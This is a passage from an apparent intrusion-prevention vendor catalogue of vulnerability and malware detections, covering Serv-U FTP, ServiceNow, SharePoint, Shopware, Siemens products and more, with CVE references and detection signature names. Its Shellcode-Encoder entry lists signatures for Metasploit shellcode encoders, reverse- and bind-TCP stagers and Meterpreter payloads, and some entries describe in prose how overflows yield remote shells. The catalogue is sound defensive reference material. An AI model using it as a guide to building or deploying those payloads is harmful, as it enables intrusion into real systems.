About this vulnerability: A vulnerability in Rhino Software Serv-U FTP Server
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Serv-U FTP Server
Type: Buffer Overflow
Description: In the Serv-U FTP server prior to version 4.2, there is a vulnerability in the processing of the FTP command SITE CHMOD command. Due to insufficient boundary checks on the input parameter (a file-name), an attacker can input excessively long data and overflow a buffer. Successfully exploiting this vulnerability allows the attacker to run code of their choice in the security context of the current FTP service, in many cases this will give the attacker complete control over the system. Once the exploit has executed its shell code successfully, the attacked target's ftp service will survive, an reverse command shell will be established between the target system and the attacker's host. The attacker could gain the control of the vulnerable Windows system. If the exploit was not successful, Serv-U ftp service will crash, and the ftp service need to be restarted in order to continue working.
Situation: FTP_CS-Serv-U-FTP-Server-Command-Buffer-Overflow
References:
CVE-2004-2111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2111
BID-9483
http://www.securityfocus.com/bid/9483
Back to top

Serv-U-List-Parameter-Buffer-Overrun

About this vulnerability: A vulnerability in Rhino Software Serv-U FTP Server
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Serv-U FTP Server
Type: Malfunction
Description: Serv-U FTP server, a popular Windows FTP server, is vulnerable to a buffer overrun. Serv-U FTP server versions 5.0.0.4 and below do not correctly validate input when an FTP LIST or NLST command is run with long malformed parameters. An attack using this vulnerability can crash the remote FTP service on the remote target. Upon successful attack, the remote Serv-U FTP server will terminate (causing a denial of service). The administrator of the vulnerable system must restart the Serv-U FTP server for the service to resume.
Situation: FTP_CS-Serv-U-List-Parameter-Buffer-Overrun
References:
CVE-2004-1992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1992
BID-10181
http://www.securityfocus.com/bid/10181
OSVDB-5546
http://www.osvdb.org/5546
Back to top

Serv-U-Stou-Command-DoS

About this vulnerability: Serv-U FTP server is vulnerable to denial of service attack
Risk: Low
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Serv-U FTP Server
Type: Malfunction
Description: Serv-U FTP version 5.2 and earlier are vulnerable to a Denial of Service (DoS) attack because of improper validation of arguments. A remote attacker could send a specially crafted STOU command that contains a reserved DOS device name to cause the service to crash.
Situation: FTP_CS-Serv-U-Stou-Command-DoS
References:
BID-11155
http://www.securityfocus.com/bid/11155
OSVDB-9898
http://www.osvdb.org/9898
Back to top

Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210

About this vulnerability: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Risk: High
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Insecure Configuration
Description: In the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0, the SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the server to connect to an arbitrary TCP port of an arbitrary host. The responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.
Situation: HTTP_CSU-Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210
References:
CVE-2014-4210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4210
Back to top

Server-Version-Number-Disclosure

About this vulnerability: Version number was in HTTP server reply header
Risk: Low
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Generic HTTP server
Type: Insecure Configuration
Description: Revealing version numbers in HTTP reply headers can be considered as harmful configuration disclosure when it clues an attacker of potential vulnerabilities.
Situation: HTTP_SHS-Server-Version-Number-Disclosure
Back to top

ServHelper-Malware-Infection-Traffic

About this vulnerability: ServHelper Malware infection traffic
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ServHelper malware infection traffic was detected.
Situation: HTTP_CRL-ServHelper-Malware-Infection-Traffic
Back to top

ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879

About this vulnerability: A vulnerability in ServiceNow
Risk: Critical
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Platform: Generic
Software: ServiceNow
Type: Input Validation
Description: A pre-authenticated remote code execution vulnerability has been reported in the ServiceNow Vancouver and Washington DC Now Platform releases.
Situation: HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879
References:
CVE-2024-4879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4879
Back to top

ServiceNow-Now-Platform-Sensitive-File-Read-CVE-2024-5178

About this vulnerability: A vulnerability in ServiceNow
Risk: High
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Platform: Generic
Software: ServiceNow
Type: Input Validation
Description: A sensitive file read vulnerability has been reported in the Service Now Washington DC, Vancouver, and Utah Now Platform releases. This vulnerability can be chained together with CVE-2024-4879 and CVE-2024-5217 for a full compromise of the vulnerable product.
Situation: HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879
References:
CVE-2024-5178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5178
Back to top

ServiceNow-Now-Platform-Template-Injection-CVE-2024-5217

About this vulnerability: A vulnerability in ServiceNow
Risk: Critical
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Platform: Generic
Software: ServiceNow
Type: Input Validation
Description: An input validation issue has been reported in the Service Now Washington DC, Vancouver, and earlier Now Platform releases. An unauthenticated attacker can use this vulnerability to bypass template injection mitigations and achieve remote code execution.
Situation: HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879
References:
CVE-2024-5217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5217
Back to top

Serviio-Media-Server-checkStreamUrl-Command-Execution

About this vulnerability: A Serviio Media Server checkStreamUrl Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Serviio Media Server
Type: Input Validation
Description: A vulnerability in Serviio Media Server, multiple versions, which allows remote attacker to execute arbitrary code with elevated privileges due to the insufficient sanitization of user supplied data in the VIDEO parameter.
Situation: HTTP_CRL-Serviio-Media-Server-checkStreamUrl-Command-Execution
References:
OSVDB-41961
http://www.osvdb.org/41961
Back to top

Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XEE-Injection

About this vulnerability: A vulnerability in SEW-EURODRIVE MOVITOOLS MotionStudio
Risk: Moderate
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Platform: Generic
Software: SEW-EURODRIVE MOVITOOLS MotionStudio
Type: Input Validation
Description: Insufficient validation of XML data when parsing the project files causes an external entity injection vulnerability in SEW-EURODRIVE MOVITOOLS Motionstudio. A successful exploitation can lead to information disclosure.
Situation: File-TextId_Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XML-External-Entity-Injection
References:
CVE-2024-1167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1167
Back to top

ShadowPad-C2-Traffic

About this vulnerability: ShadowPad C2 traffic
Risk: High
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ShadowPad malware C2 traffic was detected.
Situation: HTTP_CRL-ShadowPad-C2-Traffic
Back to top

Shady-RAT-Backdoor

About this vulnerability: Shady RAT backdoor
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Shady is a backdoor and a malicous remote access tool (RAT).
Situation: HTTP_CSH-Shady-RAT-Backdoor-Traffic
Back to top

Shamoon-DistTrack-Malware

About this vulnerability: Shamoon/DistTrack malware
Risk: High
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Shamoon/DistTrack is a piece of malware that has been used in targeted attacks. On an infected computer it corrupts files and overwrites the Master Boot Record.
Situation: HTTP_CSU-Possible-Shamoon-DistTrack-Data-Upload
SMB-TCP_Possible-Shamoon-DistTrack-Spreading-Attempt
File-Exe_Possible-Shamoon-DistTrack-Executable-Download
Back to top

Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080

About this vulnerability: A vulnerability in Sharepoint
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: A vulnerability in Microsoft Sharepoint
Situation: HTTP_CSU-MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
File-Text_MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
References:
CVE-2013-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0080
BID-58371
http://www.securityfocus.com/bid/58371
OSVDB-91149
http://www.osvdb.org/91149
MS13-024
http://technet.microsoft.com/security/bulletin/MS13-024
Back to top

Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950

About this vulnerability: An attempt to exploit a vulnerability in Sharepoint.
Risk: High
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1624-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: Microsoft SharePoint Server Elevation of Privilege Vulnerability.
Situation: HTTP_CRL-Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
File-TextId_Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
References:
CVE-2023-24950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24950
ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may
Back to top

SharePoint-Workflows-XOML-Injection-CVE-2020-0646

About this vulnerability: A vulnerability in SharePoint
Risk: High
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1862-5242
Platform: Generic
Software: Microsoft Sharepoint
Type: Input Validation
Description: There exists a vulnerability in the SharePoint .Net backend which allows remote attackers to execute arbitrary code due to the lack of input validation of XOML data sent to SharePoint via the Workflows functionality.
Situation: HTTP_CRL-SharePoint-Workflows-XOML-Injection-CVE-2020-0646
References:
CVE-2020-0646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0646
Back to top

Shellbot-Perl-Malware

About this vulnerability: Shellbot malware
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Any Software
Type: Post Compromise Behaviour
Description: Shellbot is a remote control program written in Perl. It is often installed to compromised Linux systems.
Situation: HTTP_SS-Shellbot-Malware
File-TextId_Shellbot-Malware
Back to top

Shellcode-Encoder

About this vulnerability: Generic detection for shellcode
Risk: Moderate
First detected in: sgpkg-ips-309-4219
Last changed: sgpkg-ips-1405-5242
Platform: Any Operating System
Software: Any Software
Type: Code Injection
Description: Generic detection for shellcode and shellcode encoder stubs. Exploit frameworks, such as Metasploit, generally use a library of shellcodes and shellcode encoders which are used by all generated exploits. Situations related to this vulnerability detect such shellcode sequences.
Situation: Shared_CS-x86-X90nop-Shellcode
Shared_CS-x86-X41nop-Shellcode
Shared_CS-Metasploit-Meterpreter-Upload
Shared_CS-Generic-Shellcode-3
Shared_CS-x86-X61nop-Shellcode
Shared_CS-Metasploit-Shellcode-x86-Context-Stat-Stub
Shared_CS-Metasploit-Shellcode-x86-Context-Time-Stub
Shared_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub
Shared_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub
Shared_CS-Metasploit-Shellcode-PPC-Longxor-Stub
Shared_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub
Shared_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub
Shared_CS-Suspicious-Windows-API-Stub
Shared_SS-Metasploit-Meterpreter-Injection
Shared_SS-x86-X90nop-Shellcode
Shared_SS-x86-X41nop-Shellcode
Shared_SS-Metasploit-Meterpreter-Download
Shared_SS-Metasploit-Shellcode-x86-Context-Stat-Stub
Shared_SS-Metasploit-Shellcode-x86-Context-Time-Stub
Shared_SS-Metasploit-Shellcode-x86-Context-Cpuid-Stub
Shared_SS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub
Shared_SS-Metasploit-Shellcode-PPC-Longxor-Stub
Shared_SS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub
Shared_SS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub
Shared_SS-Generic-Shellcode-Base64-Kernel32
Shared_SS-Suspicious-Windows-API-Stub
Shared-UDP_CS-x86-X90nop-Shellcode
Shared-UDP_CS-x86-X41nop-Shellcode
Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Stat-Stub
Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Time-Stub
Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub
Shared-UDP_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub
Shared-UDP_CS-Metasploit-Shellcode-PPC-Longxor-Stub
Shared-UDP_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub
Shared-UDP_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub
Common_Metasploit-Shellcode-x86-Alpha-Mixed-Stub
Common_Metasploit-Shellcode-x86-Fnstenv-Mov-Stub
Common_Metasploit-Stager-Windows-x86-Reverse-TCP-Ord
Common_Metasploit-Shellcode-x86-Jmp-Call-Additive-Stub
Common_Metasploit-Shellcode-x86-Shikata-Ga-Nai-Stub
Common_Metasploit-Shellcode-x86-Single-Static-Bit-Stub
Common_Metasploit-Shellcode-x64-Xor-Stub
Common_Generic-Shellcode-1
Common_Generic-Shellcode-Encoder-1
Common_Generic-Shellcode-Encoder-2
Common_Generic-Shellcode-Encoder-3
Common_Generic-Shellcode-Encoder-4
Common_Metasploit-Shellcode-x86-Alpha-Upper-Stub
Common_Generic-Shellcode-Encoder-5
Common_Generic-Shellcode-Encoder-6
Common_Generic-Shellcode-2
Common_Generic-Shellcode-Encoder-7
Common_Metasploit-Shellcode-Java
Common_Metasploit-Shellcode-x86-Unicode-Mixed-Stub
Common_Metasploit-Shellcode-x86-Unicode-Upper-Stub
Common_Metasploit-Shellcode-x86-Avoid-Underscore-Stub
Common_Metasploit-Shellcode-x86-Bloxor-Stub
Common_Metasploit-Shellcode-x86-NonAlpha-Stub
Common_Metasploit-Shellcode-x86-Add-Sub-Stub
Common_Metasploit-Shellcode-x86-Opt-Sub-Stub
Common_Metasploit-Shellcode-x86-NonUpper-Stub
Common_Metasploit-Shellcode-x86-Avoid-Utf8-Tolower-Stub
Common_Metasploit-Shellcode-x86-BMP-Polyglot-Stub
Common_Metasploit-Shellcode-x86-Xor-Dynamic-Stub
Common_Metasploit-Shellcode-x86-Service-Stub
Common_Metasploit-Shellcode-x64-Xor-Context
Common_Metasploit-Shellcode-x64-Xor-Dynamic
Common_Metasploit-Shellcode-x64-Zutto-Dekiru
Common_Metasploit-Shellcode-MIPS-Byte-Xori
Common_Metasploit-Shellcode-MIPS-Byte-Longxor
Common_Metasploit-Payload-Windows-x64-Exec
Common_Metasploit-Payload-Windows-x64-Messagebox
Common_Metasploit-Shellcode-x86-Call4-Dword-Xor-Stub
Common_Metasploit-Payload-Windows-X86-Format-All-Drives
Common_Metasploit-Payload-Windows-X86-Messagebox
Common_Metasploit-Payload-Windows-X86-Shell-Bind-TCP-Xpfw
Common_Metasploit-Payload-Windows-X86-Speak-Pwned
Common_Metasploit-Stager-Linux-Armle-Bind-TCP
Common_Metasploit-Stager-Linux-Armle-Reverse-TCP
Common_Metasploit-Stager-Linux-x64-Bind-TCP
Common_Metasploit-Stager-Linux-x64-Reverse-TCP
Common_Metasploit-Stager-Linux-X86-Bind-Nonx-TCP
Common_Metasploit-Stager-Linux-X86-Bind-TCP
Common_Metasploit-Shellcode-x86-Countdown-Stub
Common_Metasploit-Stager-Linux-X86-Find-Tag
Common_Metasploit-Stager-Linux-X86-Reverse-IPv6-TCP
Common_Metasploit-Stager-Linux-X86-Reverse-Nonx-TCP
Common_Metasploit-Stager-Linux-X86-Reverse-TCP
Common_Metasploit-Stager-Windows-x64-Block-API-Gen
Common_Metasploit-Stager-Windows-X86-Bind-Hidden-TCP
Common_Metasploit-Stager-Windows-X86-Bind-Nonx-TCP
Common_Metasploit-Stager-Windows-X86-Block-API-Gen
Common_Metasploit-Stager-Windows-X86-Findtag-Ord
HTTP_CRL-Php-Generic-Shellcode-Encoder-Stub
File-Text_Generic-Shellcode-3
File-Text_Generic-Shellcode-Hex-Encoded-Kernel32
File-OLE_x86-X41nop-Shellcode
File-Flash_Generic-Shellcode-3
File-PDF_x86-X90nop-Shellcode
File-PDF_x86-X41nop-Shellcode
File-Binary_x86-X90nop-Shellcode
File-Binary_x86-X41nop-Shellcode
File-Zip_Metasploit-Shellcode-JAR
File-Binary_Possible-Malware
File-Binary_Moneyshot-Shellcode-Arm-Linux-Execve
File-Binary_Moneyshot-Shellcode-Arm-Linux-Fdreuse
File-Binary_Moneyshot-Shellcode-Arm-NDS-Redscreen
File-Binary_Moneyshot-Shellcode-x86-64-Linux-Shutdown
File-Binary_Moneyshot-Shellcode-x86-64-Linux-Connectback
File-Binary_Moneyshot-Shellcode-x86-BSD-Binsh
File-Binary_Moneyshot-Shellcode-x86-Win32-Msgbox
File-Binary_Moneyshot-Shellcode-x86-Linux-Connectback
File-Binary_Moneyshot-Shellcode-x86-Linux-Bindshell
File-Binary_Moneyshot-Shellcode-x86-Linux-Forkbomb
File-Binary_Moneyshot-Shellcode-x86-Linux-Exec
File-Binary_Moneyshot-Shellcode-x86-Linux-Dup2
File-Binary_Moneyshot-Shellcode-x86-Linux-Fdreuse
File-Binary_Moneyshot-Shellcode-x86-Linux-Write
File-Binary_Moneyshot-Shellcode-x86-Linux-Binsh
File-Text_x86-X90nop-Shellcode
File-Text_x86-X41nop-Shellcode
File-Text_x86-Unescape-X90nop-Shellcode
File-TextId_x86-X41nop-Shellcode
File-Exe_Obfuscated-Shellcode-1
File-Text_Generic-Shellcode-Base64-Kernel32
Back to top

ShixxNOTE-6.net-Font-Field-Overflow

About this vulnerability: A ShixxNOTE 6.net Font Field Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ShixxNote 6.net
Type: Buffer Overflow
Description: A vulnerability in ShixxNote 6.net, build 117, which allows remote attackers to execute arbitrary code via a long font field.
Situation: Generic_CS-ShixxNOTE-6.net-Font-Field-Overflow
References:
CVE-2004-1595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1595
BID-11409
http://www.securityfocus.com/bid/11409
OSVDB-10721
http://www.osvdb.org/10721
Back to top

Shlayer-Trojan-Infection-Traffic

About this vulnerability: Shlayer trojan infection traffic
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Mac OS
Software: <os>
Type: Backdoor
Description: Shlayer Trojan infection traffic was detected. Shlayer is a Mac OS malware which commonly masquerades as a Flash installer.
Situation: HTTP_CSU-Shlayer-Trojan-Infection-Traffic
Back to top

Shopathome

About this vulnerability: ShopAtHome
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ShopAtHome
Type: Misconfiguration
Description: ShopAtHome is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Shopathome
Back to top

Shopnav

About this vulnerability: ShopNav
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ShopNav
Type: Misconfiguration
Description: ShopNav is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Shopnav
Back to top

Shopware-Gettemplatename-Local-File-Inclusion

About this vulnerability: A vulnerability in Shopware
Risk: Moderate
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Shopware
Type: Directory Traversal
Description: There exists a local file inclusion vulnerability in Shopware. A remote, unauthenticated attacker could use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Shopware-Gettemplatename-Local-File-Inclusion
References:
CVE-2016-3109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3109
Back to top

Shopware-PHP-Object-Instantiation-RCE

About this vulnerability: A vulnerability in Shopware
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Shopware
Type: Malfunction
Description: A vulnerability in Shopware, versions 5.6, 5.5, 5.4, 5.3, which allows remote attackers to execute arbitrary code via an object injection via the createInstanceFromNamedArguments function.
Situation: HTTP_CS-Shopware-PHP-Object-Instantiation-RCE
References:
CVE-2019-12799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799
Back to top

Short-SSH-Authentication

About this vulnerability: A short SSH connection detected
Risk: High
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Any Software
Type: Failed Login
Description: This fingerprint detects short SSH connections, which usually occur when authentication fails. A large number of such connections in a small period of time could indicate a SSH password login brute-force attack (See Analyzer_SSH-Password-Login-Brute-Force).
Situation: SSH_Short-SSH-Authentication
Back to top

SHOUTcast-Stream-Usage

About this vulnerability: SHOUTcast streaming media usage
Risk: Moderate
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Streaming Media
Description: The SHOUTcast protocol is used to broadcast audio over IP networks, and is utilized for example by many Internet radio stations.
Situation: HTTP_SS-SHOUTcast-Stream-Usage
HTTP_SHS-SHOUTcast-Stream-Usage
Back to top

SHTTPD-POST-Request-Buffer-Overflow

About this vulnerability: An SHTTPD POST Request Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SHTTPD
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Sergey Lyubka Simple HTTPD (SHTTPD), version 1.34, which allows remote attackers to execute arbitrary code via a long URL.
Situation: HTTP_CSU_SHTTPD-POST-Request-Buffer-Overflow
References:
CVE-2006-5216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5216
BID-20393
http://www.securityfocus.com/bid/20393
OSVDB-29565
http://www.osvdb.org/29565
Back to top

SideWinder-APT-C2-Traffic

About this vulnerability: SideWinder APT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: SideWinder is an APT actor suspected to originate from India.
Situation: HTTP_CSU-SideWinder-APT-C2-Traffic
Back to top

Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Sielco Sistemi Winlog
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sielco Sistemi Winlog
Type: Buffer Overflow
Description: A vulnerability in Sielco Sistemi Winlog may lead to remote code execution.
Situation: Generic_CS-Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow
References:
CVE-2011-0517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0517
BID-45813
http://www.securityfocus.com/bid/45813
OSVDB-70418
http://www.osvdb.org/70418
Back to top

Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow

About this vulnerability: A vulnerability in Sielco Sistemi Winlog
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sielco Sistemi Winlog
Type: Buffer Overflow
Description: A vulnerability in Sielco Sistemi Winlog may lead to remote code execution.
Situation: Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow-2
Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow
References:
CVE-2012-3815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3815
BID-53811
http://www.securityfocus.com/bid/53811
OSVDB-82654
http://www.osvdb.org/82654
Back to top

Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability

About this vulnerability: A vulnerability in Siemens Automation License Manager
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Siemens Automation License Manager
Type: Malfunction
Description: There is a vulnerability in an ActiveX control of Siemens Automation License Manager. The ActiveX control does not sufficiently sanitize its input, which may lead to remote code execution.
Situation: File-Text_Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability
References:
CVE-2011-4529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4529
Back to top

Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow

About this vulnerability: A vulnerability in Siemens Automation License Manager
Risk: Moderate
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: Siemens Automation License Manager
Type: Integer Overflow
Description: A pre-authentication denial of service vulnerability has been reported in Siemens Automation License Manager due to an integer overflow in the almsrv64x.exe component.
Situation: Generic_CS-Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow
References:
CVE-2024-44087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44087
Back to top

Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow

About this vulnerability: A Siemens FactoryLink Logging Path Param Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Siemens Tecnomatix FactoryLink
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Siemens Tecnomatix FactoryLink 8 that allows remote attackers to execute remote code via the logging function.
Situation: Generic_CS-Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow
References:
OSVDB-72812
http://www.osvdb.org/72812
Back to top

Siemens-Gigaset-se551-Authorization-Bypass

About this vulnerability: A vulnerability in Siemens Gigaset se551
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Siemens Gigaset se551
Type: Malfunction
Description: There is an authorization bypass vulnerability in Siemens Gigaset se551.
Situation: HTTP_CSU-Siemens-Gigaset-se551-Restart-Attempt
HTTP_CSU-Siemens-Gigaset-se551-Authorization-Bypass
File-Text_Siemens-Gigaset-se551-Information-Disclosure
Back to top

Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection

About this vulnerability: A vulnerability in Siemens JT2Go
Risk: Moderate
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Platform: Generic
Software: Siemens JT2Go; Siemens Teamcenter Visualization
Type: Input Validation
Description: An XXE vulnerability exists in Siemens JT2Go. The vulnerability is due to insufficient validation of XML data when parsing PLMXML files. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.
Situation: File-TextId_Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection
References:
CVE-2020-26981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26981
Back to top

Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow

About this vulnerability: A Siemens SIMATIC WinCC Flexible Runtime Stack Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Siemens SIMATIC WinCC
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Siemens SIMATIC WinCC which allows remote attackers to execute arbitrary code by sending a malicious request to the vulnerable product, due to the use of an unchecked user supplied length value.
Situation: Generic_CS-Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow
Back to top

Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Siemens SIMATIC WinCC
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Siemens SIMATIC WinCC; Siemens PCS7
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in Siemens SIMATIC WinCC. The vulnerability is due to a boundary error in the RegReader ActiveX control. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the current user.
Situation: File-Text_Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow
References:
CVE-2013-0674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0674
OSVDB-91311
http://www.osvdb.org/91311
Back to top

Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection

About this vulnerability: A vulnerability in Siemens SINEC NMS
Risk: Moderate
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Siemens SINEC NMS
Type: Input Validation
Description: Improper validation of user input causes an SQL injection vulnerability in Siemens Sinec NMS. A successful exploit allows an attacker to run arbitrary SQL on the target system.
Situation: File-Text_Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection
References:
CVE-2021-33730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33730
Back to top

Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection

About this vulnerability: A vulnerability in Siemens SINEC NMS
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Siemens SINEC NMS
Type: Input Validation
